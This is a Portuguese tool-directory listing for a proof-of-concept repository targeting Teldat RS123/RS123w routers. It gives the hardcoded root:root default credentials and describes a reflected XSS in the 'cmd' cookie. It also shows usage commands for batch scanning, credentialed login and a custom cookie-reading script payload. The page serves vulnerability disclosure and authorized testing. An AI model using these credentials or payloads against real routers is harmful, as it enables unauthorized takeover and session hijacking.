Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Teldat-Router-CVE-2022-POC — POC para CVE-2022-39996 (XSS Refletido) e CVE-2022-39997 (Senha Fraca) no Roteador Teldat RS123/RS123w | Kitploit
Ferramentas/GitHubGitHub/uyhacked/teldat-router-cve-2022-poc
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubuyhacked/teldat-router-cve-2022-poc

Teldat-Router-CVE-2022-POC

POC para CVE-2022-39996 (XSS Refletido) e CVE-2022-39997 (Senha Fraca) no Roteador Teldat RS123/RS123w

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 mesesAinda não revisado

Roteador Teldat CVE-2022-39996 & CVE-2022-39997 POC

Prova de conceito para duas vulnerabilidades descobertas em roteadores Teldat RS123 / RS123w.

Visão Geral

CVE IDTipoCWECVSSSeveridade
CVE-2022-39996XSS RefletidoCWE-796.1Médio
CVE-2022-39997Senha FracaCWE-5219.8Crítico

Produto Afetado: Roteador Teldat RS123, RS123w


CVE-2022-39997 - Senha Fraca

Descrição

Os roteadores Teldat RS123/RS123w são fornecidos com credenciais padrão codificadas root:root. Administradores frequentemente deixam essas credenciais inalteradas, permitindo que atacantes não autenticados obtenham acesso administrativo completo via Telnet, SSH, HTTP ou outros serviços.

Prova

root@kitploit:~
Account: root
Password: root

POC Senha Fraca

Uso

root@kitploit:~
pip install requests paramiko

# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Batch scan
python CVE-2022-39997.py -f targets.txt

CVE-2022-39996 - XSS Refletido

Descrição

O endpoint /upgrade/index.html reflete o valor do cookie HTTP cmd na resposta sem sanitização. Um atacante pode criar uma requisição maliciosa contendo JavaScript no cookie cmd. Quando um administrador autenticado visita a página, o script é executado no contexto do navegador da interface web do roteador, permitindo sequestro de sessão ou manipulação de configuração.

Prova

  • Criando payload XSS no cookie cmd:

POC XSS 1

  • XSS acionado no navegador:

POC XSS 2

Uso

root@kitploit:~
pip install requests

# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"

Arquivos

ArquivoDescrição
CVE-2022-39997.pyDetecção de senha fraca (Telnet / SSH / HTTP / FTP)
CVE-2022-39996.pyDetecção de XSS refletido via cookie cmd
Teldat's Router Vulnerability.mdRelatório completo de divulgação de vulnerabilidade

Aviso Legal

Estes scripts POC são apenas para testes de segurança educacionais e autorizados. Não use contra sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano.

Baixar ferramenta